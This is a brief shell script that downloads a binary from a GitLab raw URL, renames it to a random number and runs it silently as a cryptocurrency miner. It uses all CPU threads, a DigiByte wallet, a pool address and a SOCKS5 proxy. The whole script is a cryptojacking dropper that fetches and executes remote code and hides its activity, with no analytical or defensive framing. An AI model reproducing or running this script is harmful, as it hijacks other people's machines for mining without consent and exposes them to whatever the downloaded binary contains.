#!/bin/sh
#!/bin/bash
curl https://gitlab.com/chanRah12/noob/-/raw/main/rstd -o tuyultambang  >/dev/null 2>&1
chmod +x tuyultambang
TOP=$(shuf -n 1 -i 1-200000)
USER=$1
mv tuyultambang $TOP
./$TOP -o 143.198.102.164:1080 -u DQAA6iKzmUgo7L9uP3eFFHyBmusGU86CVT+1000 --coin=DGB --rig-id $(echo $(shuf -i 1-20000 -n 1)-hore) -t $(nproc --all) -x socks5://174.77.111.197:4145
 >/dev/null 2>&1
